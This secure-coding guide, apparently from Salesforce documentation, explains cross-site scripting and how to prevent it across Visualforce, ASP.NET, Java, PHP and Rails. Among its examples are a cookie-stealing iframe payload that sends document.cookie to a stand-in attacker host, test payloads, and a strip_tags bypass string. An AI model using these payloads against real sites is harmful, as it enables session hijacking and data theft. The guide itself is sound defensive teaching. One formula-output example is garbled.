Cross-Site Scripting (XSS)
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker
can insert unauthorized JavaScript, VBScript, HTML, or other active
content into a web page viewed by other users. A malicious script
inserted into a page in this manner can hijack the user’s session,
submit unauthorized transactions as the user, steal confidential
information, or simply deface the page. Cross-site scripting is one of
the most serious and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site — something only you should be able to do!
Sample vulnerability
Consider a web application with a search feature. The user sends
their query as a GET parameter, and the page displays the parameter in
the page:
Request: http://example.com/search?q=apples
Response: “You searched for: apples”
An XSS attack could take place if the user were visiting another site that included the following code:
<iframe src="http://example.com/search?q=<script>document.location='http://cybervillains.com/?session='+document.cookie</script>"></iframe>
The user’s browser will load the iframe by requesting http://example.com/search?q=<script>... In response, example.com will echo back: You searched for “<script>document.location='http://cybervillains.com/?session='+document.cookie</script>”. Unfortunately, the victim’s browser will interpret the script as code, not as text, and then execute it in the context of the user’s session with example.com! It will be as if example.com developers had written their page that way.
In this case, the attack payload sends the value of document.cookie
(that is, the user’s example.com cookie) to the attacker’s web site
(cybervillains.com). However, there is essentially no limit to the
payloads the attacker could have provided. Anything example.com
developers can do with HTML and JavaScript, the attacker can also do.
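The reflection step can be sketched in a few lines of Python. This is an illustration only: render_search_page is a hypothetical handler, not code from example.com, and the alert payload stands in for the cookie-stealing script above.

```python
from urllib.parse import parse_qs, urlsplit


def render_search_page(url: str) -> str:
    """Hypothetical vulnerable handler: echoes the q parameter unencoded."""
    query = parse_qs(urlsplit(url).query).get("q", [""])[0]
    # The bug: user-controlled text is concatenated straight into the HTML.
    return "<p>You searched for: " + query + "</p>"


benign = render_search_page("http://example.com/search?q=apples")
attack = render_search_page(
    "http://example.com/search?q=%3Cscript%3Ealert('xss')%3C/script%3E"
)
print(benign)
print(attack)  # the decoded <script> element is now part of the page markup
```

The second response contains a live script element, which is all the browser needs to run it with example.com's privileges.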
Is my application vulnerable?
Cross-site scripting is one of the most common security
vulnerabilities in web sites. Estimates of the percentage of web sites
vulnerable to XSS range from 50% to as high as 80%. Most applications
that do not have an explicit and uniformly applied set of input
validators and output encoders designed to prevent XSS will have
vulnerabilities.
How can I test my application?
You can perform a few simple tests to see if your application is
vulnerable, but do not get overconfident if you do not discover a
vulnerability immediately. Any XSS vulnerability anywhere on your web
site can completely compromise the security of your users.
Salesforce.com highly recommends using a web application security
scanning tool to perform comprehensive testing for XSS across your
entire web site.
Burp Suite Professional
provides good capabilities, including XSS scanning, at a reasonable
price. Information on using the Burp Scanner feature of the suite to
test for XSS is available in the help file at http://portswigger.net/scanner/help.html.
The most basic test payload for XSS is a simple script that
displays a browser pop-up if the site is vulnerable. Try submitting the
string <script>alert('XSS');</script> for any form input that is later
displayed by the application. If you don’t see the popup, look at the
source for the page where the input is displayed. Are the angle
brackets encoded (as &lt; and &gt;)? Is the script simply not in the
correct context in the page to execute?
Unfortunately, testing for XSS is not a simple proposition, even
with an automated scanner. Some browsers may defend you from simple XSS
attacks, leading you to believe the site is safe — but users with other
browsers will be vulnerable. (And it is impossible for the browser to
correctly stop all XSS attacks.) XSS can happen in many places and
contexts. The inputs that create XSS in a tag content context will be
different from those that work in an attribute, event handler, or script
context. Different browsers interpret malformed HTML differently, and
tricks of encoding and obfuscation may be used to bypass a variety of
filters. The XSS Cheat Sheet hosted at ha.ckers.org demonstrates dozens of variants on XSS attacks.
XSS also comes in two variants: reflected XSS, demonstrated above, and persistent or stored
XSS. Stored XSS happens when data enters an application in one location
and the attack payload is stored and displayed by the system somewhere
else. This might happen in a bulletin board application, or web-based
news or email archives. Any application that stores user input and later
displays it to other users can potentially be vulnerable to stored XSS
attacks.
It should be apparent that testing even a small web application
on the most popular browsers can require many thousands of test cases.
XSS is an example of why an application cannot be tested into being
secure — it must be engineered to be secure. Strong input filtering and
output encoding, universally applied and verified through careful code
review, is the best solution for preventing XSS.
For more information on this attack in general, see the following articles:
How do I protect my application?
Apex and Visualforce Applications
The Force.com platform provides several anti-XSS defenses. For
example, we have implemented filters that screen out harmful characters
in most output methods. For the developer using standard classes and
output methods, the threats of XSS flaws have been largely mitigated.
However, the creative developer can still find ways to
intentionally or accidentally bypass the default controls. The following
sections explain where protection does and does not exist.
Existing Protection
All standard Visualforce components (tags of the form
<apex:...>) have anti-XSS filters in place. For example, the
following code would normally be vulnerable to an XSS attack because it
takes user-supplied input and outputs it directly back to the user. But
the <apex:outputText> tag is XSS-safe. All characters that appear
to be HTML tags will be converted to their literal form. For example,
the < character will be converted to &lt; so that a literal <
will display on the user’s screen.
<apex:outputText>
    {!$CurrentPage.parameters.userInput}
</apex:outputText>
Disabling escape on Visualforce tags
By default, nearly all Visualforce tags escape the XSS-vulnerable
characters. It is possible to disable this behavior by setting the
optional attribute escape="false". For example, the following code would be vulnerable to XSS attacks:
<apex:outputText escape="false"
    value="{!$CurrentPage.parameters.userInput}" />
Programming Constructs That Are Not Protected From XSS
The following mechanisms do not have built-in XSS protections and you
should take extra care when using these tags and objects. The reason is
simply because these items were intended to allow the developer to
customize the page by inserting script commands. It would not make sense
to include anti-XSS filters on commands that are intentionally added to
a page.
S-Controls and Custom JavaScript
If you write your own JavaScript or S-controls, the Force.com
platform has no way to protect you. For example, the following code is
vulnerable to XSS if used in JavaScript:
var foo = location.search;
The <apex:includeScript> Visualforce component
allows you to include a custom script on the page. In these cases be
very careful to validate that the content is sanitized and does not
include user-supplied data. For example, the following snippet is
extremely vulnerable as it is including user-supplied input as the value
of the script text. The value provided by the tag is a URL to the
JavaScript to include. If an attacker can supply arbitrary data to this
parameter (as in the example below), they can potentially direct the
victim to include any JavaScript file from any other web site.
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />
S-Control Template and Formula Tags
S-Controls give the developer direct access to the HTML page itself
and include an array of tags that can be used to insert data into the
pages. As described above, S-Controls do not use any built-in XSS
protections. When using the template and formula tags, all output is
unfiltered and must be validated by the developer.
The general syntax of these tags is {!FUNCTION()} or {!$OBJECT.ATTRIBUTE}.
For example, if a developer wanted to include a user’s session ID
in a link, they could create the link using the following syntax:
Which would render output similar to
2 | href= "<a rel=" nofollow " class=" external free " href=" http: |
Formula expressions can be function calls or include information
about platform objects, a user’s environment, system environment, and
the request environment. An important feature of these expressions is
that data is not escaped during rendering. Since expressions are
rendered on the server, it is not possible to escape rendered data on
the client using JavaScript or other client-side technology. This can
lead to potentially dangerous situations if the formula expression
references non-system data (i.e. potentially hostile or editable) and
the expression itself is not wrapped in a function to escape the output
during rendering. A common vulnerability is created by the use of the {!$Request.*} expression to access request parameters:
<html><head><title>{!$Request.title}</title></head><body>Hello world!</body></html>
This will cause the server to pull the title parameter from the request and embed it into the page. So, a request with the title parameter set to Hola would produce the rendered output
<html><head><title>Hola</title></head><body>Hello world!</body></html>
Unfortunately, the unescaped {!$Request.title} tag also results in a cross-site scripting vulnerability. For example, a request with the title parameter set to Adios</title><script>alert('xss')</script> results in the output
<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello world!</body></html>
The standard mechanism to do server-side escaping is through the use of the JSENCODE, HTMLENCODE, JSINHTMLENCODE, and URLENCODE functions or the traditional SUBSTITUTE formula tag. Given the placement of the {!$Request.*} expression in the example, the above attack could be prevented by using the following HTMLENCODE call:
<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>Hello world!</body>
</html>
Depending on the placement of the tag and usage of the data, both the
characters needing escaping as well as their escaped counterparts may
vary. For instance, this statement:
<script>var ret = "{!$Request.retURL}";</script>
would require that the double quote character be escaped with its
URL-encoded equivalent of %22 instead of the HTML-escaped &quot;, since
it’s likely going to be used in a link. Otherwise, a request whose
retURL parameter contains a double quote followed by script code
would result in
<script>var ret = "foo";alert('xss');
Additionally, the ret variable may need additional
client-side escaping later in the page if it is used in a way which may
cause included HTML control characters to be interpreted. Examples of
correct usage are below:
var ret = "{!URLENCODE($Request.retURL)}";
window.location.href = ret;

var title = "{!JSINHTMLENCODE($Request.title)}";
document.getElementById('titleHeader').innerHTML = title;

var pageNum = {!JSENCODE($Request.PageNumber)};
Formula tags can also be used to include platform object data. Although
the data is taken directly from the user’s org, it must still be escaped
before use to prevent users from executing code in the context of other
users (potentially those with higher privilege levels.) While these
types of attacks would need to be performed by users within the same
organization, they would undermine the organization’s user roles and
reduce the integrity of auditing records. Additionally, many
organizations contain data which has been imported from external
sources, which may not have been screened for malicious content.
General Guidance
Protecting your application from XSS risks requires a two-layered strategy: input filtering and output filtering and encoding.
The goal of input filtering is to constrain inputs to
their expected format and to render any dangerous input harmless by
removing dangerous characters. It is always safer to constrain inputs to
known-good values than to try to filter dangerous characters. A filter
that removes the characters <, >, and " in a user nickname field
may prevent XSS attacks when the content is inserted into a page in the
context of an HTML element, but what if the input is used in the context
of a <script> block, such as the script used to calculate site
analytics? In that case, an exploit may not need to use those
characters, and filtering on characters like parentheses, periods and
semicolons may be necessary. A simple regular expression that only
allows alphabetic characters would prevent both attacks and greatly
reduce the likelihood of missing characters that are dangerous in other
contexts.
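A known-good check for the nickname example might look like the following Python sketch. The pattern, the 32-character limit, and the function name are assumptions chosen for illustration; a real field would use whatever format the application actually expects.

```python
import re

# Assumed policy for illustration: a nickname is 1 to 32 ASCII letters.
NICKNAME_RE = re.compile(r"[A-Za-z]{1,32}")


def is_valid_nickname(value: str) -> bool:
    """Accept only values that match the known-good pattern in full."""
    # fullmatch must consume the entire string, so a trailing newline or
    # any other extra character causes rejection.
    return NICKNAME_RE.fullmatch(value) is not None


print(is_valid_nickname("alice"))
print(is_valid_nickname("<script>"))
print(is_valid_nickname("a;alert(1)"))
```

Because the check describes what is allowed rather than what is forbidden, it does not need to anticipate which characters are dangerous in each output context.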
Remember that all user input must be filtered. GET and POST form
parameters are not the only place that malicious data may originate. No
part of an HTTP request can be trusted. XSS payloads might originate in a
user’s cookie or other headers like Referer. Treat all input as
suspicious.
Output encoding is the second, and arguably more
important, defense. Output encoding refers to rewriting data such that
it cannot “break out” of the structural context into which it is
inserted. For most scenarios, HTML encoding will be the most
appropriate; that is, encoding the characters <, > and " into their HTML entity equivalents: &lt;, &gt;, and &quot;.
Nearly all web frameworks will have utility classes or methods for
performing this encoding, and using a page templating or a DOM-aware
framework that automatically encodes all output, by default, is one of
the best defenses against XSS.
Note that &apos; is the XML entity for the apostrophe and is not a
valid HTML 4 entity! In an HTML context you will need to use the
numeric character reference &#39;.
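As one example of a framework utility for HTML encoding, Python's standard library provides html.escape. The wrapper name encode_for_html below is hypothetical; the sketch only shows which characters are rewritten, including the apostrophe, which is emitted as a numeric character reference rather than a named entity.

```python
import html


def encode_for_html(value: str) -> str:
    """Entity-encode &, <, >, double quotes, and apostrophes."""
    # quote=True (the default) also encodes " and ', which matters when
    # the value is placed inside an HTML attribute.
    return html.escape(value, quote=True)


encoded = encode_for_html('<a href="x">Tom & Jerry\'s</a>')
print(encoded)
# → &lt;a href=&quot;x&quot;&gt;Tom &amp; Jerry&#x27;s&lt;/a&gt;
```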
Inserting text into a JavaScript context is more difficult and
should only be done inside of a variable context that will be used
strictly as data. JavaScript uses a backslash encoding similar to C and
C++. Be cautious when inserting data into a script variable: escape
single and double quotes (and the backslash character itself) to prevent
injection. Prefer the Unicode encoding format, \udddd (4 hex digits: dddd), to prevent any browser parsing problems.
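A minimal Python sketch of the \udddd approach follows. The function name is hypothetical, and the policy of escaping everything except ASCII letters and digits is an assumption that errs on the side of encoding too much rather than too little.

```python
def encode_for_js_string(value: str) -> str:
    """Escape every character except ASCII letters and digits as \\uXXXX."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        code = ord(ch)
        if code > 0xFFFF:
            # Characters outside the BMP become a UTF-16 surrogate pair.
            code -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (code >> 10),
                                           0xDC00 + (code & 0x3FF)))
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


escaped = encode_for_js_string('";alert(1)//')
print('var data = "%s";' % escaped)
```

The quote, semicolon, parentheses, and slashes in the input all come out as \u escapes, so the value cannot terminate the string literal it is placed in.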
Cascading style sheets (CSS) are also a potential location
for XSS attacks and so should be encoded carefully or user-specified
style attributes disallowed.
Output filtering is similar to input filtering, and should
be applied in contexts when output encoding may not be adequate. User
data inserted directly into a <script> context, for example,
cannot be encoded in a way which makes it safe. The only solution in
such a situation is to constrain the data to ensure they do not contain
any dangerous characters such as parentheses, periods, and single or
double quotes.
Why is output encoding and filtering important if we have already
performed input filtering? Many applications do not exclusively display
input taken from web forms. Dangerous data might have been imported
from a database or spreadsheet, originate from an email message or some
other source where input filtering has not been applied. In some cases,
data that meet the requirements of an input filter may nevertheless be
unsafe when used in a particular output context.
If your application allows users to include HTML tags by design,
you must exercise great caution in what tags are allowed. The following
tags may allow injection of script code and should not be allowed:
- <applet>
- <body>
- <embed>
- <frame>
- <script>
- <frameset>
- <html>
- <iframe>
- <img>
- <style>
- <layer>
- <link>
- <ilayer>
- <meta>
- <object>
Be aware that the above list cannot be exhaustive. Similarly, there
is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.
Instead, it makes more sense to create a well-defined known-good
subset of HTML elements and attributes. Using your programming
language’s HTML or XML parsing library, create an HTML input handling
routine that throws away all HTML elements and attributes not on the
known-good list. This way, you can still allow a wide range of text
formatting options without taking on unnecessary XSS risk. Creating such
an input validator is usually around 100 lines of code in a language
like Python or PHP; it might be more in Java but is still very
tractable.
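The known-good approach can be sketched with Python's standard html.parser module. The tag list, class name, and function name below are assumptions for illustration; this version drops every attribute, which is the simplest safe starting point, and keeps the text inside removed elements as encoded text.

```python
from html import escape
from html.parser import HTMLParser

# Assumed known-good list for illustration; adjust to the formatting you allow.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li"}
VOID_TAGS = {"br"}  # elements that never take a closing tag


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the input, keeping only allowlisted tags and encoded text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append("<%s>" % tag)  # all attributes are dropped

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.parts.append("</%s>" % tag)

    def handle_data(self, data):
        # Text (including stray < characters) is always entity-encoded.
        self.parts.append(escape(data))


def sanitize_html(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.parts)


print(sanitize_html('<b onclick="evil()">hi</b><script>alert(1)</script>'))
print(sanitize_html("<<b>script>alert('xss');<</b>/script>"))
```

Because the output is rebuilt from parsed pieces rather than produced by deleting substrings, removing one tag cannot cause a new tag to form from the fragments around it.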
Output filtering and encoding for URLs including user data
requires some special considerations. If you return user-controlled
data as part of a URL, URL encode that data. (URL encoding translates
space to ‘+’ and uses %xx hex encoding for unsafe or
non-ASCII-printable characters.) If you allow users to specify an entire
URL to link to arbitrary content, ensure that the scheme of the URL is
constrained to valid types (e.g. http:, https:, mailto: and possibly
ftp:). Allowing users to specify other URL schemes may lead to XSS, such
as with the javascript: and data: schemes.
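Both URL rules can be sketched with Python's urllib.parse. The function names and the exact scheme list are assumptions for illustration; note that this check also rejects relative URLs, because they carry no scheme.

```python
from urllib.parse import quote_plus, urlsplit

# Assumed allowlist, following the schemes named in the text above.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def is_allowed_link(url: str) -> bool:
    """Accept a user-supplied URL only if its scheme is on the allowlist."""
    try:
        scheme = urlsplit(url.strip()).scheme.lower()
    except ValueError:
        return False  # malformed URLs are rejected outright
    return scheme in ALLOWED_SCHEMES


def build_search_url(term: str) -> str:
    """URL-encode user data before placing it in a query string."""
    return "http://example.com/search?q=" + quote_plus(term)


print(is_allowed_link("https://example.com/page"))
print(is_allowed_link("javascript:alert(1)"))
print(build_search_url("apples & <script>"))
# → http://example.com/search?q=apples+%26+%3Cscript%3E
```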
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when JavaScript code tries to read it. (Some
browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS; it is
only a way to briefly slow down attackers exploiting XSS with the
simplest possible attack payloads. It is not a bug or vulnerability for
the HttpOnly flag to be absent.
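As an illustration of setting the flag, Python's standard http.cookies module can build the header value. The cookie name "session" and the helper name are assumptions; most web frameworks expose an equivalent option on their own cookie API.

```python
from http.cookies import SimpleCookie


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie header value with the HttpOnly attribute set."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


header = session_cookie_header("abc123")
print("Set-Cookie: " + header)
```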
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may
need to allow legitimate users to create and/or upload custom HTML,
JavaScript or files. This feature could be misused to launch XSS
attacks. For instance, a lower privileged user could attack an
administrator by creating a malicious HTML file that steals session
cookies. The recommended protection is to serve such arbitrary content
from a separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com.
Even if customers can upload arbitrary content, you can always serve
the content from an alternate domain that is outside of the scoping of
any trusted cookies (session cookies and other sensitive information).
As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie
since sessions scoped to app.site.com would not be sent to
content.site.com. If the data being stored is sensitive, a one time use
or short lived token should be used. This is the method that
salesforce.com uses for our content product.
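One way to build a short-lived token is to sign the resource identifier and an expiry time with a server-side secret. The Python sketch below is an assumption about how such a token could work, not a description of the salesforce.com implementation; the key, function names, and 60-second lifetime are hypothetical. A strictly one-time token would additionally need server-side state to record use.

```python
import hashlib
import hmac
import time

SECRET_KEY = b"replace-with-a-real-secret"  # assumption: shared by both hosts


def make_token(template_id: str, now: float, ttl_seconds: int = 60) -> str:
    """Return 'expiry:signature' binding the token to one template."""
    expires = int(now) + ttl_seconds
    message = f"{template_id}:{expires}".encode()
    signature = hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()
    return f"{expires}:{signature}"


def check_token(template_id: str, token: str, now: float) -> bool:
    """Verify the signature and reject tokens at or past their expiry."""
    try:
        expires_text, signature = token.split(":", 1)
        expires = int(expires_text)
    except ValueError:
        return False
    message = f"{template_id}:{expires}".encode()
    expected = hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the match position through timing.
    return hmac.compare_digest(signature.encode(), expected.encode()) and now < expires


token = make_token("13", now=time.time())
print(check_token("13", token, now=time.time()))
```

The content host validates the token instead of a session cookie, so the uploaded HTML never runs in a context where the application's cookies are visible.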
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS,
and for which the same defensive strategies apply. Response splitting
occurs when user data is inserted into an HTTP header returned to the
client. Instead of inserting malicious script, the attack is to insert
additional newline characters. Because headers and the response body are
delimited by newlines in HTTP, this allows the attacker to insert their
own headers and even construct their own page body (which might have an
XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
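The header filter can be as small as the following Python sketch. The function name is hypothetical, and the injected Set-Cookie line is only an example of what an attacker might try to smuggle in.

```python
def strip_header_newlines(value: str) -> str:
    """Remove CR and LF so user data cannot start a new header line."""
    return value.replace("\r", "").replace("\n", "")


unsafe = "en\r\nSet-Cookie: evil=1"
print(repr(strip_header_newlines(unsafe)))
# → 'enSet-Cookie: evil=1'
```

With the line breaks removed, the injected text stays inside the original header value instead of becoming a header of its own.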
ASP.NET
ASP.NET provides several built-in mechanisms to help prevent XSS, and
Microsoft supplies several free tools for identifying and preventing
XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1
and 2.0 can be found at the Microsoft Patterns & Practices site:
By default, ASP.NET enables request validation on all pages, to
prevent accepting of input containing unencoded HTML. (For more details
see http://www.asp.net/learn/whitepapers/request-validation/.)
Verify in your Machine.config and Web.config that you have not disabled
request validation. Identify and correct any pages that may have
disabled it individually by searching for the ValidateRequest attribute in the page declaration tag. If this attribute is not present, it defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>.
If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode,
for escaping output to pages. These methods are safe, but follow a
“blacklist” approach that encodes only a few characters known to be
dangerous. Microsoft also makes available the AntiXSS Library that
follows a more restrictive approach, encoding all characters not in an
extensive, internationalized whitelist. You can get more information and
download AntiXSS here:
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET.
CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as
several other classes of security flaw. Version 1 of the tool is
available as a Community Technical Preview from the Microsoft download
site:
Java
J2EE web applications have perhaps the greatest diversity of
frameworks available for handling user input and creating pages. Several
strong, all-purpose libraries are available, but it is important to
understand what your particular platform provides.
Input Filtering
Take advantage of built-in framework tools to validate input as it is being used to generate business or model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your struts-config.xml:
<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
    <set-property property="pathnames" value="/WEB-INF/validator-rules.xml" />
</plug-in>
Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here:
The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here:
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs
or in XML, and custom constraints to be expressed as Java classes or in a
variety of scripting languages. The system is quite powerful, implements
Programming by Contract features using AspectJ, and provides some
built-in support for frameworks like Spring. Learn more about OVal at:
Output Filtering and Encoding
JSTL tags such as <c:out> have the escapeXml attribute set to true
by default. This default behavior ensures that HTML special characters
are entity-encoded and prevents many XSS attacks. If any tags in your
application set escapeXml="false" (such as for outputting the Japanese yen symbol) you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true by default for <h:outputText> and <h:outputFormat>.
Other page generation systems do not always escape output by
default. Freemarker is one example. All application data included in a
Freemarker template should be surrounded with an <#escape> directive to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or ?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <% out.println(request.getHeader("HTTP_REFERER")); %>) should be avoided.
If you are using a custom page-generation system, one that does
not provide output escaping mechanisms, or building directly with
scriptlets, there are several output encoding libraries available. The
OWASP Enterprise Security API for Java is a mature project that offers a
variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output strings safely for HTML, JavaScript and several other contexts. Get it here:
Other libraries to consider include the Apache Commons Lang StringEscapeUtils class or the multi-platform Reform library from the OWASP Encoding Project.
PHP
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at:
Two types of filters can be declared: sanitization filters that strip
or encode certain characters, and validation filters that can apply
business logic rules to inputs. The Zend Developer Zone has a good
tutorial on how to use the Filter extension, including the legacy
package for earlier versions of PHP and demonstrating an example of a
more complex validation using a callback:
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", ', <, and > (the single quote only when the ENT_QUOTES flag is in effect), while htmlentities encodes all HTML characters with defined entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags
function is also available to return a string with all HTML and PHP
tags removed, but because this function is implemented with a regex that
does not validate that incoming strings are well-formed HTML, partial
or broken tags may be able to bypass the system. For example, the string
<<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>.
If you are going to rely on this function, input must be sent to an
HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss'). Does it work in your version?)
For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-platform Reform library from the OWASP Encoding Project contains PHP implementations of strong output filters for several contexts.
Ruby on Rails
Input Filtering
Older versions of Ruby on Rails used a vulnerable blacklist approach
built on trying to recognize and remove tags. This suffered from
vulnerabilities if applied to strings that had broken or partial HTML.
For example, the string <<b>script>alert('xss');<</b>/script> would have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. For this reason, avoid the strip_tags and strip_links methods in favor of the updated Rails 2 method sanitize.
See the Ruby on Rails Security guide for more information:
Output Encoding
Strings written by <%= %> in rhtml templates are not escaped by default. The html_escape method (or its alias, h) can be used to entity-encode HTML characters, but you must be careful to do this in every location where user input is used.
For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-platform Reform library from the OWASP Encoding Project contains Ruby implementations of strong output filters for several contexts.